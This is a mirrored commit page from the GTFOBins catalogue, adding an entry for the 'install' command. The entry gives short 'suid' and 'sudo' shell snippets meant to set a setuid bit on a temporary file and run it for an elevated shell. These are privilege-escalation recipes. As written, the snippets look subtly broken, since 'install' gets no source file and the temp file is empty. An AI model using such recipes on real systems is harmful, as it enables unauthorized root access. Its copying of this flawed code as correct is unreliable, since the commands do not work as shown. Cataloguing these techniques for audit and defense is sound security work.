mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-08-23 09:34:56 +02:00
New command: install
This commit is contained in:
13
_gtfobins/install.md
Normal file
13
_gtfobins/install.md
Normal file
@@ -0,0 +1,13 @@
|
|||||||
|
---
|
||||||
|
functions:
|
||||||
|
suid:
|
||||||
|
- code: |
|
||||||
|
TF=$(mktemp)
|
||||||
|
install -m 4755 $TF
|
||||||
|
$TF -p
|
||||||
|
sudo:
|
||||||
|
- code: |
|
||||||
|
TF=$(mktemp)
|
||||||
|
sudo install -m 4755 $TF
|
||||||
|
$TF -p
|
||||||
|
---
|
Reference in New Issue
Block a user